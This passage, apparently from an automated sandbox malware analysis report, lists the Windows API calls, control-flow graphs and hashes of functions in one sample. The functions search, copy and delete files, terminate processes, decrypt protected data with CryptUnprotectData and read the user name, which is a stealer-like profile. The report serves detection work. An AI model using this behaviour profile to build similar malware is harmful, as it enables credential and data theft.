                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                    • Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850
                                                                                                                                                                                                                                                    • Part of subcall function 004148F3: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042EEFC,00407497,?,00000014), ref: 00414960
                                                                                                                                                                                                                                                    • Part of subcall function 004148F3: lstrlenA.KERNEL32(00000000), ref: 004149BE
                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,?), ref: 00401E57
                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(?,?,?,?,?,004316B0), ref: 00401E8D
                                                                                                                                                                                                                                                  • FindClose.KERNEL32(?,?,?,004316B0), ref: 00401EA4
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D82
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: CreateFileA.KERNEL32 ref: 0040AEA5
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: GetFileSizeEx.KERNEL32(00000000,?), ref: 0040AEB5
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 0040AED8
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 0040AEF9
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: CloseHandle.KERNEL32(00000000), ref: 0040AF1F
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004020F2
                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,?), ref: 004021D0
                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040220F
                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040221E
                                                                                                                                                                                                                                                    • Part of subcall function 0041797D: Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00417A27
                                                                                                                                                                                                                                                    • Part of subcall function 0041797D: CreateThread.KERNEL32(00000000,00000000,Function_0001A90D,?,00000000,00000000), ref: 00417A79
                                                                                                                                                                                                                                                    • Part of subcall function 0041797D: WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,?,?,?,?,?,?,?,004017BD,?), ref: 00417A85
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcatlstrlen$AllocHandleLocalObjectReadSingleSizeSleepSystemThreadTimeWait
                                                                                                                                                                                                                                                  • String ID: \*.*
                                                                                                                                                                                                                                                  • API String ID: 2017216726-1173974218
                                                                                                                                                                                                                                                  • Opcode ID: eef532cc65a97336aa04c3431b8e41e9d8b606ca34f2aae58e883b8c3ab284e0
                                                                                                                                                                                                                                                  • Instruction ID: 1220b35e9d2845434e99ad0bf1b72ddbdabecf6e0090be4ca8ca09fb3933a3c4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eef532cc65a97336aa04c3431b8e41e9d8b606ca34f2aae58e883b8c3ab284e0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4052B5B59002189BCF05FFA2CC56AEE7779AF44309F04815EF41567192DF386B89CBA8
                                                                                                                                                                                                                                                  Function 004152A5 Relevance: 13.6, APIs: 9, Instructions: 57processCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 3356 4152a5-4152cf CreateToolhelp32Snapshot Process32First 3357 4152d1-4152db Process32Next 3356->3357 3358 41532e-41533f CloseHandle 3356->3358 3357->3358 3359 4152dd-4152e8 3357->3359 3360 4152eb-4152f5 StrCmpCA 3359->3360 3361 415322-41532c Process32Next 3360->3361 3362 4152f7-41530b OpenProcess 3360->3362 3361->3358 3361->3360 3363 415316-41531f CloseHandle 3362->3363 3364 41530d-415310 TerminateProcess 3362->3364 3363->3361 3364->3363
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004152BD
                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,?), ref: 004152C7
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 004152D3
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?), ref: 004152ED
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00415301
                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00415310
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00415317
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 00415324
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041532F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3836391474-0
                                                                                                                                                                                                                                                  • Opcode ID: 744bf93798593bbbf3aff87105b76b44fa1c2028e89e1f0adc62def67fc8c5fa
                                                                                                                                                                                                                                                  • Instruction ID: a2afd96498c18a56c68c4cfc557fe070022b821dc9dd236c37024e5ac4685a68
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 744bf93798593bbbf3aff87105b76b44fa1c2028e89e1f0adc62def67fc8c5fa
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E11C839200705AFD3202B61AC4EFAB7BADFFC6751F051019FA0592251DFB49851CA75
                                                                                                                                                                                                                                                  Function 00414B70 Relevance: 10.6, APIs: 7, Instructions: 66memoryencryptionCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,004073EC,?,?,?,?,?), ref: 00414BA6
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,004073EC,?,?,?,?,?), ref: 00414BB9
                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000008,?,?,004073EC,?,?,?,?,?), ref: 00414BC3
                                                                                                                                                                                                                                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,004073EC,?,?,?,?,?), ref: 00414BDA
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,004073EC,?,?,?,?,?), ref: 00414BF4
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,004073EC,?,?,?,?,?), ref: 00414C02
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,004073EC,?,?,?,?,?), ref: 00414C0D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Heap$BinaryCryptProcessString$AllocateErrorFreeLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 798923657-0
                                                                                                                                                                                                                                                  • Opcode ID: 7589891c4f873d9eacc06b29ea4d395704f2ffe9cccf2032afe3450d41c03d5a
                                                                                                                                                                                                                                                  • Instruction ID: 1bfb67afbcc3eeebdcc58bb0437d5f96cd4b86678791dfef96fa76067c12a520
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7589891c4f873d9eacc06b29ea4d395704f2ffe9cccf2032afe3450d41c03d5a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9118B75205205AFE7209FA5AC84F57BBA9FBC9744F16042DFA8083210DB79DC859BA0
                                                                                                                                                                                                                                                  Function 00401458 Relevance: 7.5, APIs: 5, Instructions: 42registrymemoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00401475
                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00401484
                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(?,?,00000000,00020119), ref: 00401493
                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF), ref: 004014AD
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 004014B6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3466090806-0
                                                                                                                                                                                                                                                  • Opcode ID: ee248f4dd53c38405bf247ca8ee5238ced5863a67be360a17d9aa5f3422ff77d
                                                                                                                                                                                                                                                  • Instruction ID: 11042f845f27c60c9cfe49634e62bc90fad70a14fa62364d3bf2c67db5fe234b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee248f4dd53c38405bf247ca8ee5238ced5863a67be360a17d9aa5f3422ff77d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0F04F75104254BFD310AB66EC4DD1BBFADFFC6B55F001429F98492160D6359C14DB71
                                                                                                                                                                                                                                                  Function 0040B006 Relevance: 4.5, APIs: 3, Instructions: 42memoryencryptionCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CryptUnprotectData.CRYPT32 ref: 0040B03B
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040B057
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 0040B073
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2068576380-0
                                                                                                                                                                                                                                                  • Opcode ID: c45f9d86cd296bcbfa173a7556aa1cf9a65bdabc4f7db8be125951dd596eadab
                                                                                                                                                                                                                                                  • Instruction ID: 231cd1f39a8479791712d5f3edf0a94c60cf588e50de6fedb89cc5dbc35e2890
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c45f9d86cd296bcbfa173a7556aa1cf9a65bdabc4f7db8be125951dd596eadab
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D90140755083029BD701EF64D845A1BFBE5FFC8754F008A2AF88493351E730D994CB92
                                                                                                                                                                                                                                                  Function 00413D91 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,0040129D,?,004315D8), ref: 00413D94
                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,0040129D,?,004315D8), ref: 00413DA3
                                                                                                                                                                                                                                                  • GetUserNameA.ADVAPI32(00000000), ref: 00413DB1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1206570057-0
                                                                                                                                                                                                                                                  • Opcode ID: 5d518cf6961e07d286ed60c3f8fb2455d35567b628f951d60df5cb2ce1d2a2c4
                                                                                                                                                                                                                                                  • Instruction ID: 9335b4869ff5d5de368b717405b7ae0b04054e65bb97385264346cc33f41d643
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d518cf6961e07d286ed60c3f8fb2455d35567b628f951d60df5cb2ce1d2a2c4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4D06CB5B002606FD620AB6AAC0DE8B3A6CEB8AB65B850170F905D7250D6749846C6A9
                                                                                                                                                                                                                                                  Function 00407382 Relevance: 60.3, APIs: 27, Strings: 7, Instructions: 761networkstringmemoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
